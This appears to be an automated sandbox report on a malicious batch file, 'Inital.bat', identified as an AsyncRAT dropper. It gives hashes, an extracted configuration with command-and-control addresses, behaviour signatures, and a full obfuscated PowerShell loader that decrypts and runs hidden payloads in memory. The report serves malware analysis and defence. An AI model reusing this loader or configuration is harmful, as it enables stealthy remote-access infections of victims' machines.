Resubmissions
23-05-2024 05:33
240523-f8yy7afc8w 1022-05-2024 19:39
240522-yc9d6adh9s 1022-05-2024 19:09
240522-xtyhjsdb21 1022-05-2024 19:06
240522-xscvfsda5y 1022-05-2024 16:28
240522-tyxj9shb7z 10Analysis
-
max time kernel
61s -
max time network
64s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
22-05-2024 16:28
Static task
static1
General
-
Target
Inital.bat
-
Size
63KB
-
MD5
e9319ac7284b6bbadf0200fee286b6c1
-
SHA1
51c30382aa103118937f1a9bf453a8345febafb4
-
SHA256
09d4308c18ecece489a51b7837968bcfc6c1273d83f5c83614bbdd119ccf6961
-
SHA512
73e349b61c285cdb3cfdf41ae9ba166cc0f8e5c7b989bf744f9aa8433baf41ea3a01b46fa9a88cc97fa4ca5d80f57a9dbd8fea631a164566c9e95632c9f3404b
-
SSDEEP
1536:Z6e+aDqc6V/xOtoqfF4OycI/k0xqAD/xtM:Z6aDqpVuoqKL5fkAvM
Malware Config
Extracted
asyncrat
0.5.8
RATED
147.185.221.17:25565
147.185.221.17:37531
Dudee4vQEqBD
-
delay
3
-
install
false
-
install_file
AnticheatBiner.exe
-
install_folder
%AppData%
Signatures
-
Async RAT payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/3956-24-0x0000000006D80000-0x0000000006D92000-memory.dmp family_asyncrat -
Blocklisted process makes network request 5 IoCs
Processes:
powershell.exeflow pid process 21 3956 powershell.exe 43 3956 powershell.exe 48 3956 powershell.exe 49 3956 powershell.exe 50 3956 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepid process 3956 powershell.exe 824 powershell.exe 1768 powershell.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
powershell.exepowershell.exepowershell.exepid process 3956 powershell.exe 3956 powershell.exe 824 powershell.exe 824 powershell.exe 824 powershell.exe 1768 powershell.exe 1768 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3956 powershell.exe Token: SeDebugPrivilege 824 powershell.exe Token: SeDebugPrivilege 1768 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
cmd.execmd.execmd.exedescription pid process target process PID 904 wrote to memory of 3956 904 cmd.exe powershell.exe PID 904 wrote to memory of 3956 904 cmd.exe powershell.exe PID 904 wrote to memory of 3956 904 cmd.exe powershell.exe PID 3528 wrote to memory of 824 3528 cmd.exe powershell.exe PID 3528 wrote to memory of 824 3528 cmd.exe powershell.exe PID 3528 wrote to memory of 824 3528 cmd.exe powershell.exe PID 3960 wrote to memory of 1768 3960 cmd.exe powershell.exe PID 3960 wrote to memory of 1768 3960 cmd.exe powershell.exe PID 3960 wrote to memory of 1768 3960 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Inital.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rQsZbBPOPJCvxNhL0LUES/xBoGdJPo5xjQuRz/WAY2Y='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DjbA3otpI3NZoCoqJZkIpQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $XrWyO=New-Object System.IO.MemoryStream(,$param_var); $udTvC=New-Object System.IO.MemoryStream; $DGCBl=New-Object System.IO.Compression.GZipStream($XrWyO, [IO.Compression.CompressionMode]::Decompress); $DGCBl.CopyTo($udTvC); $DGCBl.Dispose(); $XrWyO.Dispose(); $udTvC.Dispose(); $udTvC.ToArray();}function execute_function($param_var,$param2_var){ $ILwNn=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XDsjo=$ILwNn.EntryPoint; $XDsjo.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Inital.bat';$AUAcT=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Inital.bat').Split([Environment]::NewLine);foreach ($RmJpd in $AUAcT) { if ($RmJpd.StartsWith(':: ')) { $jmZjY=$RmJpd.Substring(3); break; }}$payloads_var=[string[]]$jmZjY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Inital.bat" "1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rQsZbBPOPJCvxNhL0LUES/xBoGdJPo5xjQuRz/WAY2Y='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DjbA3otpI3NZoCoqJZkIpQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $XrWyO=New-Object System.IO.MemoryStream(,$param_var); $udTvC=New-Object System.IO.MemoryStream; $DGCBl=New-Object System.IO.Compression.GZipStream($XrWyO, [IO.Compression.CompressionMode]::Decompress); $DGCBl.CopyTo($udTvC); $DGCBl.Dispose(); $XrWyO.Dispose(); $udTvC.Dispose(); $udTvC.ToArray();}function execute_function($param_var,$param2_var){ $ILwNn=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XDsjo=$ILwNn.EntryPoint; $XDsjo.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Inital.bat';$AUAcT=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Inital.bat').Split([Environment]::NewLine);foreach ($RmJpd in $AUAcT) { if ($RmJpd.StartsWith(':: ')) { $jmZjY=$RmJpd.Substring(3); break; }}$payloads_var=[string[]]$jmZjY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Inital.bat" "1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rQsZbBPOPJCvxNhL0LUES/xBoGdJPo5xjQuRz/WAY2Y='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DjbA3otpI3NZoCoqJZkIpQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $XrWyO=New-Object System.IO.MemoryStream(,$param_var); $udTvC=New-Object System.IO.MemoryStream; $DGCBl=New-Object System.IO.Compression.GZipStream($XrWyO, [IO.Compression.CompressionMode]::Decompress); $DGCBl.CopyTo($udTvC); $DGCBl.Dispose(); $XrWyO.Dispose(); $udTvC.Dispose(); $udTvC.ToArray();}function execute_function($param_var,$param2_var){ $ILwNn=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XDsjo=$ILwNn.EntryPoint; $XDsjo.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Inital.bat';$AUAcT=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Inital.bat').Split([Environment]::NewLine);foreach ($RmJpd in $AUAcT) { if ($RmJpd.StartsWith(':: ')) { $jmZjY=$RmJpd.Substring(3); break; }}$payloads_var=[string[]]$jmZjY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
1KB
MD56195a91754effb4df74dbc72cdf4f7a6
SHA1aba262f5726c6d77659fe0d3195e36a85046b427
SHA2563254495a5513b37a2686a876d0040275414699e7ce760e7b5ee05e41a54b96f5
SHA512ed723d15de267390dc93263538428e2c881be3494c996a810616b470d6df7d5acfcc8725687d5c50319ebef45caef44f769bfc32e0dc3abd249dacff4a12cc89
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheFilesize
53KB
MD506ad34f9739c5159b4d92d702545bd49
SHA19152a0d4f153f3f40f7e606be75f81b582ee0c17
SHA256474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba
SHA512c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
16KB
MD5d698d5937b0204919ccb06a782c042d1
SHA15f4c02afe416a24d7088a6871c7b47ae36385ddc
SHA25687f0fd106d1323c21a53129669dd49574f73c872234a3041cda0b6ffc6351ecc
SHA512f284a51d82714418699b7e485394fd4d2586548869c7c430808c3755d34e80ba936559ae13a22e08c78e9fe3092667b607b10e51059cf5fbcbaad58e19c9250b
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_owm1vz5k.iq3.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
memory/824-43-0x0000000074510000-0x0000000074CC0000-memory.dmpFilesize
7.7MB
-
memory/824-39-0x0000000074510000-0x0000000074CC0000-memory.dmpFilesize
7.7MB
-
memory/824-38-0x0000000074510000-0x0000000074CC0000-memory.dmpFilesize
7.7MB
-
memory/824-28-0x0000000074510000-0x0000000074CC0000-memory.dmpFilesize
7.7MB
-
memory/3956-20-0x00000000073A0000-0x0000000007A1A000-memory.dmpFilesize
6.5MB
-
memory/3956-26-0x000000007451E000-0x000000007451F000-memory.dmpFilesize
4KB
-
memory/3956-19-0x0000000005C40000-0x0000000005C8C000-memory.dmpFilesize
304KB
-
memory/3956-18-0x0000000005B90000-0x0000000005BAE000-memory.dmpFilesize
120KB
-
memory/3956-0-0x000000007451E000-0x000000007451F000-memory.dmpFilesize
4KB
-
memory/3956-21-0x0000000006D20000-0x0000000006D3A000-memory.dmpFilesize
104KB
-
memory/3956-22-0x0000000006D50000-0x0000000006D58000-memory.dmpFilesize
32KB
-
memory/3956-23-0x0000000006D60000-0x0000000006D6E000-memory.dmpFilesize
56KB
-
memory/3956-24-0x0000000006D80000-0x0000000006D92000-memory.dmpFilesize
72KB
-
memory/3956-17-0x00000000056B0000-0x0000000005A04000-memory.dmpFilesize
3.3MB
-
memory/3956-27-0x0000000074510000-0x0000000074CC0000-memory.dmpFilesize
7.7MB
-
memory/3956-7-0x0000000005640000-0x00000000056A6000-memory.dmpFilesize
408KB
-
memory/3956-6-0x00000000055D0000-0x0000000005636000-memory.dmpFilesize
408KB
-
memory/3956-5-0x0000000004CE0000-0x0000000004D02000-memory.dmpFilesize
136KB
-
memory/3956-3-0x0000000074510000-0x0000000074CC0000-memory.dmpFilesize
7.7MB
-
memory/3956-4-0x0000000074510000-0x0000000074CC0000-memory.dmpFilesize
7.7MB
-
memory/3956-2-0x0000000004D70000-0x0000000005398000-memory.dmpFilesize
6.2MB
-
memory/3956-1-0x00000000046E0000-0x0000000004716000-memory.dmpFilesize
216KB